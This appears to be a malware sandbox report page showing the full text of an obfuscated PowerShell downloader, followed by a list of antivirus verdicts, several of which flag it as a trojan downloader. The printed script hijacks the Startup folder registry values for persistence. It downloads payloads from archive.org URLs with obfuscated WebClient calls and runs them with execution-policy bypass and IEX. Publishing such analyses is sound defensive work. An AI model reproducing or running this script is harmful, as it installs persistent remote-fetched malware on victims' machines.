Static | ZeroBOX
No static analysis available.
$A0="C:xxx.com\Run".Replace("xxx.com","\Users\Public")
$A1 = "CrEP".Replace("EP","eateDirectory")
$BB = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
$CC= "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
$DD = "C:leejonkun".Replace("leejonk","\Users\Public\R")
$EE ="C:kimjongun".Replace("kimjong","\Users\Public\R")
$cv = 'C:\Uscat'.Replace("c","ers\Public\Run\Run.b")
$cd = 'C:\js1'.Replace("j","Users\Public\ Microsoft.p")
$jj = "C:\jav.com.ps1".Replace("jav.com","Users\Public\ Microsoft")
$link = 'https://ia601404.us.archive.org/12/items/server_20210426/Server.txt'
[system.io.directory]::$A1($A0)
start-sleep -s 5
Set-ItemProperty -Path $BB -Name "Startup" -Value $DD;
Set-ItemProperty -Path $CC -Name "Startup" -Value $EE;
start-sleep -s 5
Function vip
start-sleep -s 5
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('htt@@@@@@@@@@@@@@@@@@@@@@@@@/bat02.txt'.Replace("@@@@@@@@@@@@@@@@@@@@@@@@@","ps://ia801400.us.archive.org/0/items/bat02"),$cv)){
start-sleep -s 5
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"($link, $cd)){
start-sleep -s 3
powershell -windo 1 -noexit -exec bypass -file $jj
IEX vip
Antivirus Signature
Bkav Clean
MicroWorld-eScan Heur.BZC.PZQ.Boxter.794.C1C92E66
FireEye Heur.BZC.PZQ.Boxter.794.C1C92E66
CAT-QuickHeal Clean
ALYac Heur.BZC.PZQ.Boxter.794.C1C92E66
Malwarebytes Clean
AegisLab Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
Cyren Clean
Symantec ISB.Downloader!gen281
ESET-NOD32 PowerShell/TrojanDownloader.Agent.DTA
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
ClamAV Clean
Kaspersky Clean
BitDefender Heur.BZC.PZQ.Boxter.794.C1C92E66
NANO-Antivirus Clean
SUPERAntiSpyware Clean
Tencent Clean
Ad-Aware Heur.BZC.PZQ.Boxter.794.C1C92E66
Comodo Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Sophos Clean
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Heur.BZC.PZQ.Boxter.794.C1C92E66
ViRobot Clean
ZoneAlarm Clean
GData Heur.BZC.PZQ.Boxter.794.C1C92E66
Cynet Clean
AhnLab-V3 Clean
BitDefenderTheta Clean
MAX malware (ai score=83)
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
Qihoo-360 Clean
No IRMA results available.